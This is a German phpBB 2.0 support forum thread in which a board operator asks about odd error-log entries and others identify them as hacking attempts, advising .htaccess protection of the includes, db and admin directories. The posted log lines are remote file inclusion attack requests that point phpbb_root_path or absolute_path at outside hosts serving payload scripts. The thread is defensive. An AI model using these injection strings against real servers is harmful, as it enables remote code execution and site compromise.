Seltsame Errorlog-Einträge

Probleme bei der regulären Arbeiten mit phpBB, Fragen zu Vorgehensweisen oder Funktionsweise sowie sonstige Fragen zu phpBB im Allgemeinen.
Forumsregeln
phpBB 2.0 hat das Ende seiner Lebenszeit überschritten
phpBB 2.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 2.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf phpBB 3.1, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
bbill
Mitglied
Beiträge: 19
Registriert: 08.01.2006 10:31

Seltsame Errorlog-Einträge

Beitrag von bbill »

Hallo zusammen,

seit neustem finde ich solche Einträge in meinen Errorlogs:
http:********/components/com_minibb.php?absolute_path=http://193.239.120.188/alex.gif?
http:********/includes/functions.php?phpbb_root_path=http://www.tagdesschachs.de/news/tools/net/auto.txt?
http:********/includes/functions_mod_user.php?phpbb_root_path=http://revolvingdoorslammers.net/member ... titled.txt?
http:********/includes/functions_mod_user.php?phpbb_root_path=http://www.yagenoysentoplesen.com/spread.txt?
usw.
Wird da vielleicht eine Schwachstelle getestet oder was hat es damit auf sich?
Bin für jede Info dankbar. :)

VG
bbill
Benutzeravatar
gn#36
Ehrenadmin
Beiträge: 9313
Registriert: 01.10.2006 16:20
Wohnort: Ganz in der Nähe...
Kontaktdaten:

Beitrag von gn#36 »

phpbb_root_path ist eine Variable die den Pfad zum Stammverzeichnis deines Forums enthält. Wird diese - wie hier offenbar versucht wird - auf eine andere Domain/Verzeichnis umgeleitet kann im Ernstfall der Hacker eigene Skripte auf deinem Server ausführen. --> Das sind Hackingversuche.

Evtl. solltest du - falls noch nicht geschehen - das gesamte Includes Verzeichnis per HTACCESS schützen (hier im Board existieren ein paar Themen dazu). Außerdem sollten alle Dateien, die in Benutzerkontakt geraten sollen diese Variable direkt am Anfang setzen. Die phpBB eigenen Dateien tuen dies, außerdem gibt es eine Konstante die gesetzt wird (IN_PHPBB) und in allen anderen Dateien, die nicht in Benutzerkontakt geraten sollen als erstes Abgefragt wird. Sollte die Variable nicht definiert sein verweigert die Datei alle weiteren Dienste. Dies sollte allerdings auch in sämtlichen zusätzlichen Dateien von Mods so sein. Naja, ansonsten erfährst du zu diesem Thema auch in der Suche dieses Boards sicher mehr.
Begegnungen mit dem Chaos sind fast unvermeidlich, Aber nicht katastrophal, solange man den Durchblick behält.
Übertreiben sollte man's im Forum aber nicht mit dem Chaos, denn da sollen ja andere durchblicken und nicht nur man selbst.
bbill
Mitglied
Beiträge: 19
Registriert: 08.01.2006 10:31

Beitrag von bbill »

Zuerst mal danke für die Infos.
Evtl. solltest du - falls noch nicht geschehen - das gesamte Includes Verzeichnis per HTACCESS schützen (hier im Board existieren ein paar Themen dazu).
Peinlich, dass ich das bisher noch nicht gemacht habe. :oops:
Die Verzeichnisse includes und db sind nun geschützt.

VG
bbill
Benutzeravatar
cYbercOsmOnauT
Ehemaliges Teammitglied
Beiträge: 3820
Registriert: 18.02.2004 23:02
Wohnort: Göttingen
Kontaktdaten:

Beitrag von cYbercOsmOnauT »

Wenn Du schonmal dabei bist, solltest Du auch das admin Verzeichnis schützen. ;)

Gruß,
Tekin
• prof. phpbb-Installation, Reparatur, Rettung nach Hackattacken, sowie PHP/JS Programmierung aller Art
Zend Certified Engineer, Linux Administrator und die Sicherheit von 34 Jahren Programmiererfahrung
• Interesse? Kontakt unter t.birduezen@web-coding.eu
bbill
Mitglied
Beiträge: 19
Registriert: 08.01.2006 10:31

Beitrag von bbill »

cYbercOsmOnauT hat geschrieben:Wenn Du schonmal dabei bist, solltest Du auch das admin Verzeichnis schützen. ;)
Moin Moin! :)
Wenn ich mich in den Adminbereich klicke; da reicht es wohl nicht, dass ich mich dort jedesmal als User anmelde, oder?

VG
bbill
Benutzeravatar
larsneo
Mitglied
Beiträge: 2622
Registriert: 07.03.2002 15:23
Wohnort: schwäbisch gmünd
Kontaktdaten:

Beitrag von larsneo »

da reicht es wohl nicht, dass ich mich dort jedesmal als User anmelde, oder?
nein, denn die htaccess soll in erster linie davor schützen, dass einzelne dateien aus dem /admin folder direkt von aussen aufgerufen werden.
gruesse aus dem wilden sueden
larsneo
..::[krapohl.net]::..
bbill
Mitglied
Beiträge: 19
Registriert: 08.01.2006 10:31

Beitrag von bbill »

Ok, danke für eure Hilfe! :)
Antworten

Zurück zu „phpBB 2.0: Administration, Benutzung und Betrieb“